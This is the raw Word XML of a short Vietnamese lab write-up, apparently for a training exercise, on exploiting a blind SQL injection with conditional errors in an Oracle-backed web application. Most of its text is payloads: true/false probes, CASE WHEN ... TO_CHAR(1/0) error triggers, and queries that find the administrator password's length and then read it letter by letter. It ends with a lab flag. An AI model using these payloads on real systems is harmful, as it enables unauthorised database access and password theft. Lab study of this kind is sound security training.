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E98" w14:textId="0A748B5E" w:rsidR="002F49FE" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đây là 1 lỗi blind sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413397D" w14:textId="475C158D" w:rsidR="00D5030F" w:rsidRDefault="00725B63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D5030F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B1: Thử tiêm các đk để xem các phản hồi khác nhau của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E278829" w14:textId="28406E40" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload: xyz’ AND ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD25A93" w14:textId="372398ED" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xyz’ AND ‘1’=’2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE933D" w14:textId="7E0A133E" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5030F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các phản hồi giống nhau</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5030F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thất bại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63912B94" w14:textId="5341C8EC" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC5DEC0" w14:textId="305CD924" w:rsidR="00D5030F" w:rsidRDefault="00725B63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D5030F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B2: Tiêm các đk để kích hoạt lỗi của cơ sở dữ liệu. (là Oracle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D49EAD" w14:textId="4FFBFDB5" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:xyz’ AND (SELECT CASE WHEN (1=1) THEN </w:t>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TO_CHAR(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1/0</w:t>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ELSE ‘a’ END FROM dual)=’a</w:t>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00725B63" w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 500 Internal Server Error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E3E63" w14:textId="56B73606" w:rsidR="00D5030F" w:rsidRDefault="00D5030F" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xyz’ AND (SELECT CASE WHEN (1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) THEN 1/0 ELSE ‘a’ END FROM dual)=’a</w:t>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00725B63" w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200 Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1F744" w14:textId="220751B1" w:rsidR="00725B63" w:rsidRDefault="00725B63" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khai thác dữ liệu từng chút một</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA8E17" w14:textId="033DBF0F" w:rsidR="00725B63" w:rsidRDefault="00725B63" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- Xác định độ dài MK: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CA9C6" w14:textId="6554886D" w:rsidR="00725B63" w:rsidRDefault="00725B63" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: xyz’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND (SELECT CASE WHEN (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LENGTH(password)=20</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00725B63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đúng nên báo lỗi .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702A4B2" w14:textId="7046FF65" w:rsidR="00725B63" w:rsidRDefault="00725B63" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Xác định từng chữ cái của mk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0B136" w14:textId="70D4311C" w:rsidR="00725B63" w:rsidRDefault="004D0EA2" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: xyz’ </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0EA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND (SELECT CASE WHEN (SUBSTR(password,1,1)='m') THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CFABB" w14:textId="40F1D474" w:rsidR="00980957" w:rsidRDefault="00BC1F68" w:rsidP="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag; xrtah991nxswpagaoo62;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6890926D" w14:textId="77777777" w:rsidR="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D29B183" w14:textId="77777777" w:rsidR="00D5030F" w:rsidRPr="00D5030F" w:rsidRDefault="00D5030F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D5030F" w:rsidRPr="00D50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80"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004D0EA2"/>
    <w:rsid w:val="00725B63"/>
    <w:rsid w:val="00980957"/>
    <w:rsid w:val="00B23980"/>
    <w:rsid w:val="00BC1F68"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00D5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BC2BA8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{49B03374-636B-4A4E-8040-5993BAC6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2022-09-28T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-28T08:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>